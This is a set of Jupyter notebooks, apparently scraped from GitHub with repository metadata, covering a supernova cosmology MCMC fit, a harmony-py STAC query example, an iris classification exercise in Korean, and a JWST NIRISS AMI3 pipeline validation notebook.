"import emcee\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\nimport chainconsumer \nimport matplotlib.pyplot as plt\nfrom scipy.integrate import quad\nfrom chainconsumer import ChainConsumer\nplt.rc('font', size=15) # controls default text sizes\nplt.rc('axes', titlesize=15) # fontsize of the axes title\nplt.rc('axes', labelsize=15) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=12) # fontsize of the tick labels\nplt.rc('ytick', labelsize=12) # fontsize of the tick labels\nplt.rc('legend', fontsize=12) # legend fontsize\n%config InlineBackend.figure_format = 'svg'\n",
"_____no_output_____"
],
[
"data_pd = pd.read_csv(\"hlsp_ps1cosmo_panstarrs_gpc1_all_model_v1_lcparam-full.txt\",sep=' ',usecols=[0,1,2,3,4,5])\nz = data_pd['zhel'].astype(np.float)\ndz = data_pd['dz'].astype(np.float)\nmuB = data_pd['mb'].astype(np.float)\ndmuB = data_pd['dmb'].astype(np.float)\n\ndata = {}\ndata['z'] = z\ndata['dz'] = dz\ndata['muB'] = muB\ndata['dmuB'] = dmuB",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = [20, 12] # set plotsize\nplt.rcParams.update({'font.size': 22}) # set fontsize\nfig,ax = plt.subplots(1,1)\nxlim = (0, 2)\nylim = (13, 27)\n#xlabel = r\"$z$\"\n#ylabel = r\"$\\mu_{B}$\"\n\nax.errorbar(x=z,y=muB,xerr=dz,yerr=dmuB,linestyle='None')\nax.set_xlim(xlim)\nax.set_ylim(ylim)\nleg = ax.legend(loc='lower right')\nax.set_xlabel('Redshift (z)')\nax.set_ylabel('Distance modulus (mu)')\nax.set_title('Distance modulus vs redshift for Type 1a SNe ')",
"WARNING:matplotlib.legend:No handles with labels found to put in legend.\n"
],
[
"\ndef get_default_parameters(update=None):\n pars = {}\n pars['omega_m'] = 0.3\n pars['omega_L'] = 0.7\n pars['omega_K'] = 0.0\n pars['h'] = 0.72\n pars['w'] = -1.\n if update is not None:\n pars.update(update)\n return pars\n\ndef get_starting_point(name_list):\n sp = {}\n sp['omega_m'] = 0.24\n sp['omega_L'] = 0.74\n sp['omega_K'] = 0.0\n sp['h'] = 0.65\n sp['w'] = -1. \n return np.array([sp[x] for x in name_list])\n\ndef get_latex_names(name_list):\n latex_names = {}\n latex_names['omega_m'] = '$\\Omega_m$'\n latex_names['omega_L'] = '$\\Omega_L$'\n latex_names['omega_K'] = '$\\Omega_K$'\n latex_names['h'] = '$h$'\n latex_names['w'] = '$w$'\n \n return [latex_names[x] for x in name_list]\n#constraints on the parameter values\nparameter_limits={\n 'omega_m' : [0., 1.],\n 'omega_L' : [0., 1.],\n 'omega_K' : [0., 0.], #Flat Universe\n 'h' : [.2, 1.],\n 'w' : [-1., -1.] #Lambda CDM\n }",
"_____no_output_____"
],
[
"def log_prior(pars, names):\n count = 0\n for name in names:\n limits = parameter_limits[name]\n low, high = limits[0], limits[1]\n if pars[name]<low or pars[name]>high:\n count+=1\n if count!=0:\n return -np.inf\n else: \n prior = 0\n prior += ((pars['h']-0.6766)/0.0042)**2 #Planck h gaussian\n prior += ((pars['omega_m']-0.315)/0.007)**2 #Planck Omega_m gaussian\n return prior\n\ndef log_likelihood(fit_par_values, fit_par_names, flat):\n # f_gas data\n z, muB, dmuB = data['z'], data['muB'], data['dmuB']\n \n pars = get_default_parameters()\n \n for par_value, par_name in zip(fit_par_values, fit_par_names):\n pars[par_name] = par_value\n \n if not np.isfinite(log_prior(pars, fit_par_names)):\n return -np.inf\n \n else:\n log_likelihood = 0.\n \n if flat==True:\n pars['omega_L'] = 1 - pars['omega_m']\n pars['omega_K'] = 0.\n else:\n pars['omega_K'] = 1 - pars['omega_m'] - pars['omega_K']\n\n\n for z_i, muB_i, dmuB_i in zip(z,muB,dmuB): \n muB_model = mu_model(z_i, pars)\n log_likelihood +=((muB_i-muB_model)**2)/(dmuB_i)**2\n\n return -log_likelihood - log_prior(pars, fit_par_names)\n",
"_____no_output_____"
],
[
"def E_z(z, pars):\n omega_m = pars['omega_m']\n omega_L = pars['omega_L']\n omega_K = 0\n w = pars['w']\n EoS = (1+z)**(3*(1+w))\n return np.sqrt(omega_m*(1+z)**3 + omega_L*EoS + omega_K*(1+z)**2)\n\ndef one_over_E_z(z, pars):\n return 1/E_z(z, pars)\n\ndef d_l(z, pars):\n #scale hubble paramter\n H0 = pars['h']*100\n #speed of light\n c = 299792.458 # c in km/s\n #integrate for DL based on the given values of paratmers\n integral = quad(one_over_E_z, 0.01, z, args=(pars))[0]\n factor =c/(H0*(1+z))\n return factor*integral\n\ndef mu_model(z, pars):\n return 5*np.log10(d_l(z,pars))+25\n",
"_____no_output_____"
],
[
"def run_mcmc(fit_par_names, flat=True):\n pars = get_default_parameters()\n starting_point = get_starting_point(fit_par_names)\n std = 0.2*starting_point\n ndim = len(fit_par_names)\n nwalkers = 32\n\n p0 = emcee.utils.sample_ball(starting_point, std, size=nwalkers)\n sampler = emcee.EnsembleSampler(nwalkers, ndim, log_likelihood, args=[fit_par_names,flat])\n sampler.run_mcmc(p0, 20000, progress=True);\n samples = sampler.get_chain(discard=10000, flat=True)\n\n if flat==True and 'omega_m' in fit_par_names:\n #print('first one')\n\n samples_new = np.column_stack((1-samples[:,0], samples))\n \n elif flat==False and 'omega_m' in fit_par_names:\n #print('second one')\n try:\n samples_new = np.column_stack((1-samples[:,fit_par_names.index('omega_m')]-\n samples[:,fit_par_names.index('omega_L')], samples))\n except:\n samples_new = np.column_stack((1-samples[:,fit_par_names.index('omega_m')]-\n pars['omega_L'], samples))\n else:\n samples_new = samples\n return samples_new",
"_____no_output_____"
],
[
"fit_par_names = ['omega_m', 'h']\nchain = run_mcmc(fit_par_names, flat=True)",
"100%|██████████| 20000/20000 [01:26<00:00, 232.42it/s]\n"
],
[
"par_names_latex = get_latex_names(['omega_L']+fit_par_names)\n\n\nc = ChainConsumer().add_chain(chain, parameters=par_names_latex).configure(statistics=\"max\", summary=True,usetex=False)\nfig = c.plotter.plot()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2cd890e004077e34dc92de53cc02e9065d20ab | 3,331 | ipynb | Jupyter Notebook | examples/job_stac.ipynb | frankinspace/harmony-py | 04d432a44188ef5e4dcdeeee7517caafb35c39f6 | [
"Apache-2.0"
] | 25 | 2021-02-19T17:45:49.000Z | 2022-02-27T22:09:13.000Z | examples/job_stac.ipynb | frankinspace/harmony-py | 04d432a44188ef5e4dcdeeee7517caafb35c39f6 | [
"Apache-2.0"
] | 19 | 2021-02-09T21:18:02.000Z | 2022-01-03T17:00:44.000Z | examples/job_stac.ipynb | frankinspace/harmony-py | 04d432a44188ef5e4dcdeeee7517caafb35c39f6 | [
"Apache-2.0"
] | 13 | 2021-01-25T16:14:03.000Z | 2021-11-04T15:08:16.000Z | 23.792857 | 148 | 0.563795 | [
[
[
"## Harmony Py Library\n### Job Results STAC data",
"_____no_output_____"
]
],
[
[
"import sys\nsys.path.append('..')\n!{sys.executable} -m pip install -q -r ../requirements/examples.txt\n\n# Install harmony-py requirements. Not necessary if you ran `pip install harmony-py` in your kernel \n!{sys.executable} -m pip install -q -r ../requirements/core.txt\n\nfrom harmony import BBox, Client, Collection, Request, Environment\n",
"_____no_output_____"
]
],
[
[
"First, let's get a job processing in Harmony.",
"_____no_output_____"
]
],
[
[
"harmony_client = Client(env=Environment.UAT) # assumes .netrc usage\n\ncollection = Collection(id='C1234088182-EEDTEST')\nrequest = Request(\n collection=collection,\n spatial=BBox(-165, 52, -140, 77)\n)\n\njob_id = harmony_client.submit(request)\njob_id\n",
"_____no_output_____"
]
],
[
[
"Harmony-py can return the STAC Catalog URL for a completed job.",
"_____no_output_____"
]
],
[
[
"stac_catalog_url = harmony_client.stac_catalog_url(job_id, show_progress=True)\n",
"_____no_output_____"
]
],
[
[
"Following the directions for PySTAC (https://pystac.readthedocs.io/en/latest/quickstart.html), we can hook our harmony-py client into STAC_IO.",
"_____no_output_____"
]
],
[
[
"from urllib.parse import urlparse\nimport requests\nfrom pystac import STAC_IO\n\ndef requests_read_method(uri):\n parsed = urlparse(uri)\n if parsed.hostname.startswith('harmony.'):\n return harmony_client.read_text(uri)\n else:\n return STAC_IO.default_read_text_method(uri)\n\nSTAC_IO.read_text_method = requests_read_method",
"_____no_output_____"
],
[
"from pystac import Catalog\n\ncat = Catalog.from_file(stac_catalog_url)\n\nprint(cat.title)\nfor item in cat.get_all_items():\n print(item.datetime, [asset.href for asset in item.assets.values()])",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2cdada48c59d06749ccecd5e3e08640ab46352 | 14,181 | ipynb | Jupyter Notebook | code/Day02_answer/Day02_3_iris_excercise(LGBM).ipynb | hoesung/blockchain-devML-course | ff6ba6ca2479ddb07e4868d503cf57d2d28a4652 | [
"MIT"
] | 1 | 2020-08-05T16:29:27.000Z | 2020-08-05T16:29:27.000Z | code/Day02_answer/Day02_3_iris_excercise(LGBM).ipynb | hoesung/blockchain-devML-course | ff6ba6ca2479ddb07e4868d503cf57d2d28a4652 | [
"MIT"
] | null | null | null | code/Day02_answer/Day02_3_iris_excercise(LGBM).ipynb | hoesung/blockchain-devML-course | ff6ba6ca2479ddb07e4868d503cf57d2d28a4652 | [
"MIT"
] | null | null | null | 28.475904 | 1,357 | 0.417742 | [
[
[
"# 붓꽃(Iris) 품종 데이터 예측하기\n\n",
"_____no_output_____"
],
[
"<h1>Table of Contents<span class=\"tocSkip\"></span></h1>\n<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#DataFrame\" data-toc-modified-id=\"DataFrame-1\"><span class=\"toc-item-num\">1 </span>DataFrame</a></span></li><li><span><a href=\"#Train/Test-데이터-나누어-학습하기\" data-toc-modified-id=\"Train/Test-데이터-나누어-학습하기-2\"><span class=\"toc-item-num\">2 </span>Train/Test 데이터 나누어 학습하기</a></span></li><li><span><a href=\"#데이터-학습-및-평가하기\" data-toc-modified-id=\"데이터-학습-및-평가하기-3\"><span class=\"toc-item-num\">3 </span>데이터 학습 및 평가하기</a></span></li><li><span><a href=\"#교차-검증-(Cross-Validation)\" data-toc-modified-id=\"교차-검증-(Cross-Validation)-4\"><span class=\"toc-item-num\">4 </span>교차 검증 (Cross Validation)</a></span><ul class=\"toc-item\"><li><span><a href=\"#교차검증-종류\" data-toc-modified-id=\"교차검증-종류-4.1\"><span class=\"toc-item-num\">4.1 </span>교차검증 종류</a></span></li><li><span><a href=\"#Kfold\" data-toc-modified-id=\"Kfold-4.2\"><span class=\"toc-item-num\">4.2 </span>Kfold</a></span></li><li><span><a href=\"#StratifiedKFold\" data-toc-modified-id=\"StratifiedKFold-4.3\"><span class=\"toc-item-num\">4.3 </span>StratifiedKFold</a></span></li><li><span><a href=\"#LeaveOnOut\" data-toc-modified-id=\"LeaveOnOut-4.4\"><span class=\"toc-item-num\">4.4 </span>LeaveOnOut</a></span></li></ul></li></ul></div>",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n\nfrom sklearn import * \nfrom sklearn.datasets import load_iris\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score",
"_____no_output_____"
]
],
[
[
"## DataFrame",
"_____no_output_____"
]
],
[
[
"iris = load_iris()\niris_df = pd.DataFrame(data=iris.data,columns=iris.feature_names)\niris_df['label'] = iris.target\niris_df",
"_____no_output_____"
],
[
"iris_df.shape",
"_____no_output_____"
]
],
[
[
"## Train/Test 데이터 나누어 학습하기",
"_____no_output_____"
]
],
[
[
"X_train, X_test, y_train, y_test = train_test_split(iris.data, iris.target,\n test_size = 0.3,\n random_state = 100)",
"_____no_output_____"
]
],
[
[
"## 데이터 학습 및 평가하기\n\n사용 할 모델_ LGBM\n```python \nfrom lightgbm import LGBMClassifier\nmodel_lgbm = LGBMClassifier() # 모델정의하기 \nmodel_lgbm.fit(???,???) # 모델학습\nmodel_lgbm.score(???,???) # 모델점수보기 \nmodel_lgbm.predict(???,???) # 모델 학습결과저장 \n```",
"_____no_output_____"
]
],
[
[
"# 모델정의하기 \n# 모델학습\n# 모델점수보기 \n# 모델 학습결과저장 ",
"_____no_output_____"
]
],
[
[
"## 교차 검증 (Cross Validation)\n\n\n### 교차검증 종류 \n1. K-fold Cross-validation\n - 데이터셋을 K개의 sub-set으로 분리하는 방법 \n - 분리된 K개의 sub-set중 하나만 제외한 K-1개의 sub-sets를 training set으로 이용하여 K개의 모델 추정\n - 일반적으로 K=5, K=10 사용 (-> 논문참고)\n - K가 적어질수록 모델의 평가는 편중될 수 밖에 없음\n - K가 높을수록 평가의 bias(편중된 정도)는 낮아지지만, 결과의 분산이 높을 수 있음\n\n\n2. LOOCV (Leave-one-out Cross-validation)\n - fold 하나에 샘플 하나만 들어있는 K겹 교차 검증\n - K를 전체 숫자로 설정하여 각 관측치가 데이터 세트에서 제외될 수 있도록 함\n - 데이터셋이 클 때는 시간이 매우 오래 걸리지만, 작은 데이터셋에서는 좋은 결과를 만들어 냄\n - 장점 : Data set에서 낭비 Data 없음\n - 단점 : 측정 및 평가 고비용 소요\n \n\n \n3. Stratified K-fold Cross-validation\n - 정답값이 모든 fold에서 대략 동일하도록 선택됨\n - 각 fold가 전체를 잘 대표할 수 있도록 데이터를 재배열하는 프로세스\n\n",
"_____no_output_____"
],
[
"### Kfold\n```python\nfrom sklearn.model_selection import KFold\nkfold = KFold(n_splits = 5, shuffle=False) # 교차검증 방법 설정\n\nfrom sklearn.model_selection import cross_val_score, cross_validate\ncross_val_score(????, iris.data, iris.target, cv=kfold)\n\n```",
"_____no_output_____"
],
[
"### StratifiedKFold\n```python\nfrom sklearn.model_selection import StratifiedKFold\nskfold = StratifiedKFold(n_splits = 5, shuffle=False) #교차검증 방법 설정 \n\ncross_val_score(???,\n iris.data,\n iris.target,\n cv=skfold # 나눌 덩어리 횟수\n )\n```",
"_____no_output_____"
],
[
"### LeaveOnOut \n```python \nfrom sklearn.model_selection import LeaveOneOut\nleavefold = LeaveOneOut() #교차검증 방법 설정 \n\ncross_val_score(???,\n iris.data,\n iris.target,\n cv=leavefold # 나눌 덩어리 횟수\n )\n\n```",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb2cfe52ab994a61bca75b95090aa2c5bdd33c41 | 23,994 | ipynb | Jupyter Notebook | jwst_validation_notebooks/ami3/run_ami_pipeline.ipynb | aggle/jwst_validation_notebooks | ce029d2a94a55becff0bdc8f88909734864462a9 | [
"BSD-3-Clause"
] | null | null | null | jwst_validation_notebooks/ami3/run_ami_pipeline.ipynb | aggle/jwst_validation_notebooks | ce029d2a94a55becff0bdc8f88909734864462a9 | [
"BSD-3-Clause"
] | null | null | null | jwst_validation_notebooks/ami3/run_ami_pipeline.ipynb | aggle/jwst_validation_notebooks | ce029d2a94a55becff0bdc8f88909734864462a9 | [
"BSD-3-Clause"
] | null | null | null | 33.325 | 331 | 0.568017 | [
[
[
"<a id=\"title_ID\"></a>\n# JWST Pipeline Validation Notebook: AMI3, AMI3 Pipeline\n\n<span style=\"color:red\"> **Instruments Affected**</span>: NIRISS\n\n### Table of Contents\n\n<div style=\"text-align: left\"> \n \n<br> [Introduction](#intro)\n<br> [JWST CalWG Algorithm](#algorithm)\n<br> [Defining Terms](#terms)\n<br> [Test Description](#description)\n<br> [Data Description](#data_descr)\n<br> [Set up Temporary Directory](#tempdir)\n<br> [Imports](#imports)\n<br> [Loading the Data](#data_load)\n<br> [Run the Pipeline](#pipeline)\n<br> [Test Results](#testing)\n<br> [About This Notebook](#about) \n\n</div>",
"_____no_output_____"
],
[
"<a id=\"intro\"></a>\n# Introduction\n\nThe notebook verifies that pipeline steps from `calwebb_detector1` through `calwebb_image2` and `calwebb_ami3` run without crashing. `calwebb_ami3` is run on various associations of target and calibrator pairs.\n\nFor more information on the `calwebb_ami3` pipeline stage visit the links below. \n\n> Stage description: https://jwst-pipeline.readthedocs.io/en/latest/jwst/pipeline/calwebb_ami3.html\n>\n> Pipeline code: https://github.com/spacetelescope/jwst/tree/master/jwst/ami\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"algorithm\"></a>\n# JWST CalWG Algorithm\n\n`calwebb_ami3` is based on the `implaneia` algorithm:\n> https://github.com/anand0xff/ImPlaneIA/tree/delivery\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"terms\"></a>\n# Defining Terms\n\nCalibrator: reference star to measure PSF to calibrate out instrumental contributions to the interferometric observables \n\nPSF: point spread function\n\nTarget: source of interest for science program \n\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"description\"></a>\n# Test Description\n\nThis test checks that simulated data runs through the `calwebb_detector1`, `calwebb_image2`, and `calwebb_ami3` steps of the pipeline without crashing. Association files are created for the target/calibrator pair at different dither positions. The notebook verifies that the `calwebb_ami3` runs on these association files.\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"data_descr\"></a>\n# Data Description\n\nThe data for this test are simulated AMI datasets that do not have bad pixels. The simulated source data is AB Dor, which is simulated with a 4-point dither pattern:\n\n| Source | Filename| Dither Position |\n|:----------------|:---------|:-----------------|\n|AB Dor (Target) |jw01093001001_01101_00005_nis_uncal.fits| 1|\n| |jw01093001001_01101_00006_nis_uncal.fits| 2 |\n| |jw01093001001_01101_00007_nis_uncal.fits| 3 |\n| |jw01093001001_01101_00005_nis_uncal.fits| 4 |\n\nHD 37093 is the PSF reference star, which is also simulated with a 4-point dither pattern.\n\n| Source | Filename| Dither Position |\n|:----------------|:---------|:-----------------|\n|HD 37093 (Calibrator)| jw01093002001_01101_00005_nis_uncal.fits | 1 |\n| |jw01093002001_01101_00006_nis_uncal.fits | 2 |\n| |jw01093002001_01101_00007_nis_uncal.fits | 3 |\n| |jw01093002001_01101_00005_nis_uncal.fits | 4 |\n\nConfiguration files are also needed for the various `calwebb_ami3` steps:\n- ami_analyze.cfg\n- ami_normalize.cfg\n- ami_average.cfg\n- calwebb_ami3.cfig\n\nSpecific reference files are needed for the analysis, which also do not have bad pixels, and are loaded with this notebook.\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"<a id=\"tempdir\"></a>\n# Set up Temporary Directory\n\n\n[Top of Page](#title_ID)",
"_____no_output_____"
]
],
[
[
"use_tempdir = True\n\n# Create a temporary directory to hold notebook output, and change the working directory to that directory.\nfrom tempfile import TemporaryDirectory\nimport os\nimport shutil\n\nif use_tempdir:\n data_dir = TemporaryDirectory()\n\n # Save original directory\n orig_dir = os.getcwd()\n\n # Move to new directory\n odir = data_dir.name\n os.chdir(data_dir.name)\n\n# For info, print out where the script is running\nprint(\"Running in {}\".format(os.getcwd()))",
"_____no_output_____"
],
[
"import os\nif 'CRDS_CACHE_TYPE' in os.environ:\n if os.environ['CRDS_CACHE_TYPE'] == 'local':\n os.environ['CRDS_PATH'] = os.path.join(os.environ['HOME'], 'crds', 'cache')\n elif os.path.isdir(os.environ['CRDS_CACHE_TYPE']):\n os.environ['CRDS_PATH'] = os.environ['CRDS_CACHE_TYPE']\nprint('CRDS cache location: {}'.format(os.environ['CRDS_PATH']))",
"_____no_output_____"
]
],
[
[
"<a id=\"imports\"></a>\n# Imports\nList the package imports and why they are relevant to this notebook.\n\n* astropy.io for opening fits files\n* numpy for working with arrays\n* IPython.display for printing markdown output\n* jwst.datamodels for building model for JWST Pipeline\n* jwst.pipeline.collect_pipeline_cfgs for gathering configuration files\n* jwst.pipeline for initiating various pipeline stages\n* jwst.ami to call the AMI Analyze step\n* jwst.associations for using association files\n* from ci_watson.artifactory_helpers import get_bigdata for reading data from Artifactory\n\n\n[Top of Page](#title_ID)",
"_____no_output_____"
]
],
[
[
"from astropy.io import fits\nimport numpy as np\nfrom IPython.display import Markdown\nfrom jwst.datamodels import ImageModel\nimport jwst.datamodels as datamodels\n\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.pipeline import Detector1Pipeline, Image2Pipeline, Image3Pipeline, Ami3Pipeline \nfrom jwst.ami import AmiAnalyzeStep \nfrom jwst.associations import asn_from_list\nfrom jwst.associations.lib.rules_level3_base import DMS_Level3_Base\n\nfrom ci_watson.artifactory_helpers import get_bigdata",
"_____no_output_____"
]
],
[
[
"<a id=\"data_load\"></a>\n# Loading the Data\n[Top of Page](#title_ID)",
"_____no_output_____"
]
],
[
[
"# Data files that will be imported by Artifactory:\ndatafiles = np.array(['jw01093001001_01101_00005_nis_uncal.fits',\n 'jw01093001001_01101_00006_nis_uncal.fits',\n 'jw01093001001_01101_00007_nis_uncal.fits',\n 'jw01093001001_01101_00008_nis_uncal.fits',\n 'jw01093002001_01101_00005_nis_uncal.fits',\n 'jw01093002001_01101_00006_nis_uncal.fits',\n 'jw01093002001_01101_00007_nis_uncal.fits',\n 'jw01093002001_01101_00008_nis_uncal.fits'])\n\n# Read in reference files needed for this analysis (these don't have bad pixels, like simulations)\nsuperbiasfile = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'jwst_niriss_superbias_sim.fits')\ndarkfile = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'jwst_niriss_dark_sub80_sim.fits')\nflatfile = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze', \n 'jwst_niriss_flat_general.fits')\n\n# Read in configuration files\nami_analyze_cfg = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'ami_analyze.cfg')\nami_normalize_cfg = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'ami_normalize.cfg')\nami_average_cfg = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'ami_average.cfg')\ncalwebb_ami3_cfg = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n 'calwebb_ami3.cfg')",
"_____no_output_____"
]
],
[
[
"<a id=\"pipeline\"></a>\n# Run the Pipeline\n\nSince this notebook tests whether the pipeline runs on all the datasets, we will run each stage of the pipeline in separate cells. That way, if a step fails, it will be easier to track down at what stage and step this error occurred.\n\n[Top of Page](#title_ID)",
"_____no_output_____"
],
[
"## Run Detector1 stage of the pipeline to calibrate \\*\\_uncal.fits file",
"_____no_output_____"
]
],
[
[
"for file in datafiles:\n\n df = get_bigdata('jwst_validation_notebooks',\n 'validation_data',\n 'ami_analyze',\n file)\n \n # Modify a keyword in each data file: only necessary for now\n # Next three lines are temporary to accommodate recent changes to Mirage and pipeline\n # and for Mirage to work with the pipeline.\n with datamodels.open(df) as model:\n model.meta.dither.dither_points = int(model.meta.dither.dither_points)\n model.save(df)\n\n # Run Detector1 stage of pipeline, specifying superbias and dark reference files\n result1 = Detector1Pipeline()\n result1.superbias.override_superbias = superbiasfile\n result1.dark_current.override_dark = darkfile\n result1.ipc.skip = True\n result1.save_results = True\n result1.output_dir = odir\n result1.run(df)",
"_____no_output_____"
]
],
[
[
"## Run Image2 stage of the pipeline to calibrate \\*\\_rate.fits file",
"_____no_output_____"
]
],
[
[
"for df in datafiles:\n\n # Run Image2 stage of the pipeline on the file created above to create rate file,\n # specifying flat field file\n df_rate = os.path.join(odir, os.path.basename(df.replace('uncal','rate')))\n result2 = Image2Pipeline() \n result2.flat_field.override_flat = flatfile\n result2.photom.skip = True\n result2.resample.skip = True\n result2.save_results = True\n result2.output_dir = odir\n result2.run(df_rate)",
"_____no_output_____"
]
],
[
[
"## Run Image2 stage of the pipeline to calibrate \\*\\_rateints.fits file",
"_____no_output_____"
]
],
[
[
"for df in datafiles:\n\n # Run Image stage of the pipeline to create rateints file, specifying flat field file\n df_rateints = os.path.join(odir,os.path.basename(df.replace('uncal','rateints')))\n result3 = Image2Pipeline()\n result3.flat_field.override_flat = flatfile\n result3.photom.skip = True\n result3.resample.skip = True\n result3.save_results = True\n result3.output_dir = odir\n result3.run(df_rateints) ",
"_____no_output_____"
]
],
[
[
"## Run AmiAnalyze step on the \\*\\_cal.fits files created above",
"_____no_output_____"
]
],
[
[
"for df in datafiles:\n\n # Set up name of calibrated file\n df_cal = os.path.join(odir,os.path.basename(df.replace('uncal','cal')))\n \n # Run AMI Analyze Step of the pipeline\n result5 = AmiAnalyzeStep.call(df_cal, config_file = ami_analyze_cfg,\n output_dir = odir, save_results = True)",
"_____no_output_____"
]
],
[
[
"## Run AmiAnalyze on various target/calibrator pairs\n\nCreate association files to test calibration of target at different dither positions. Run AmiAnalyze on these association files. \n\nNote: the `program` and `targ_name` fields in the association files are the same for all pairs, so I have them set as default values in the `create_asn` routine.",
"_____no_output_____"
],
[
"Routine for creating association files (in \\*.json format)",
"_____no_output_____"
]
],
[
[
"def create_asn(outdir, targ1, psf1, prod_name, out_file, asn_id, \n program=\"1093_2_targets_f480m_2022.25coords_pipetesting\", \n targ_name='t001',\n targ2=None, psf2=None):\n \n # Create association file:\n asn = asn_from_list.asn_from_list([os.path.join(outdir,targ1)],\n product_name = prod_name,\n output_file = os.path.join(outdir,out_file),\n output_dir = outdir,rule = DMS_Level3_Base)\n \n asn['products'][0]['members'].append({'expname': os.path.join(odir,psf1),\n 'exptype': 'psf'})\n \n # check whether 2nd set of target/calibrator pairs was inputted\n if targ2 is not None: \n asn['products'][0]['members'].append({'expname':os.path.join(odir,targ2), \n 'exptype': 'science'})\n asn['products'][0]['members'].append({'expname':os.path.join(odir,psf2), \n 'exptype': 'psf'})\n\n\n\n asn['asn_type'] = 'ami3'\n asn['asn_id'] = asn_id\n asn['program'] = program\n asn['target'] = targ_name\n \n with open(os.path.join(outdir,out_file), 'w') as fp:\n fp.write(asn.dump()[1])\n fp.close()",
"_____no_output_____"
]
],
[
[
"### Create association files and run AmiAnalyze on these pairs",
"_____no_output_____"
],
[
"Association file 1 to calibrate average of targets at dithers 2 and 3 with the average of calibrators at dithers 2 and 3. ",
"_____no_output_____"
]
],
[
[
"asn1_file = \"ami_asn001_targets23_cals23.json\"\n\ntarg1 = \"jw01093001001_01101_00006_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00006_nis_cal.fits\"\nprod_name = \"jw01093001001_01101\"\nasn_id = '001'\n\n# Add second target/calibrator pair at this dither step\ntarg2 = \"jw01093001001_01101_00007_nis_cal.fits\"\npsf2 = \"jw01093002001_01101_00007_nis_cal.fits\"\n\ncreate_asn(odir, targ1, psf1, prod_name, asn1_file, asn_id, targ2=targ2, psf2=psf2)\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn1_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 2 to calibrate target at POS1 with calibrator at POS1",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn2_file = \"ami_asn002_calibrate_targ1_cal1.json\"\n\ntarg1 = \"jw01093001001_01101_00005_nis_cal.fits\"\npsf1 = 'jw01093002001_01101_00005_nis_cal.fits'\nprod_name = \"jw01093001001_01101_00005cal00005\"\nasn_id = '002'\n\ncreate_asn(odir, targ1, psf1,prod_name, asn2_file, asn_id)\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn2_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 3 to calibrate target at POS2 with calibrator at POS2",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn3_file = \"ami_asn003_calibrate_targ2_cal2.json\"\n\ntarg1 = \"jw01093001001_01101_00006_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00006_nis_cal.fits\"\nprod_name = \"jw01093001001_01101_00006cal00006\"\nasn_id = '003'\n\ncreate_asn(odir, targ1, psf1, prod_name, asn3_file, asn_id)\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 4 to calibrate target at POS3 with calibrator at POS3",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn4_file = \"ami_asn004_calibrate_targ3_cal3.json\"\n\ntarg1 = \"jw01093001001_01101_00007_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00007_nis_cal.fits\"\nprod_name = \"jw01093001001_01101_00007cal00007\"\nasn_id = '004'\n\ncreate_asn(odir, targ1, psf1, prod_name, asn4_file, asn_id)\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
"Association file 5 to calibrate target at POS4 with calibrator at POS4",
"_____no_output_____"
]
],
[
[
"# Create association file:\nasn5_file = \"ami_asn005_calibrate_targ4_cal4.json\"\n\ntarg1 = \"jw01093001001_01101_00008_nis_cal.fits\"\npsf1 = \"jw01093002001_01101_00008_nis_cal.fits\"\nprod_name = \"jw01093001001_01101_00008cal00008\"\nasn_id = '005'\n\ncreate_asn(odir, targ1, psf1, prod_name, asn5_file, asn_id)\n\n# Run AmiAnalyze\nAmi3Pipeline.call(asn3_file,config_file = calwebb_ami3_cfg,output_dir = odir) ",
"_____no_output_____"
]
],
[
[
